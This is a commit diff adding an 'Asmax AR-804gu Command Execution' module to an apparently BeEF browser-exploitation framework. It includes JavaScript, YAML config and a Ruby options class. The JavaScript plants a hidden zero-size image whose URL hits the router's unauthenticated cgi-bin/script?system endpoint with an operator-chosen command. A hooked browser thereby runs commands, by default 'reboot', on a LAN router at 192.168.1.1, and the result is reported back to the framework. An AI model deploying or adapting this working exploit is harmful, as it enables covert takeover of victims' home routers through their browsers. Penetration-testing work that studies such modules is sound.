Added Asmax AR-804gu Command Execution module

modules/exploits/router/asmax_ar804gu_cmd_exec/command.js

@@ -0,0 +1,38 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = 'cgi-bin/script?system%20';
+	var cmd     = '<%= @cmd %>';
+
+	var img = new Image();
+	img.setAttribute("style","visibility:hidden");
+	img.setAttribute("width","0");
+	img.setAttribute("height","0");
+	img.id = 'asmax_ar804gu';
+	img.src = gateway+path+cmd;
+	document.body.appendChild(img);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(img);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        asmax_ar804gu_cmd_exec:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Asmax AR-804gu Command Execution"
+            description: "Attempts to execute arbitrary commands on a Asmax AR-804gu (OSVDB# 54895).<br/>For more information see, http://www.securitum.pl/dh/asmax-ar-804-gu-compromise"
+            authors: ["bcoles", "Michal Sajdak"]
+            target:
+                working: ["ALL"]

modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end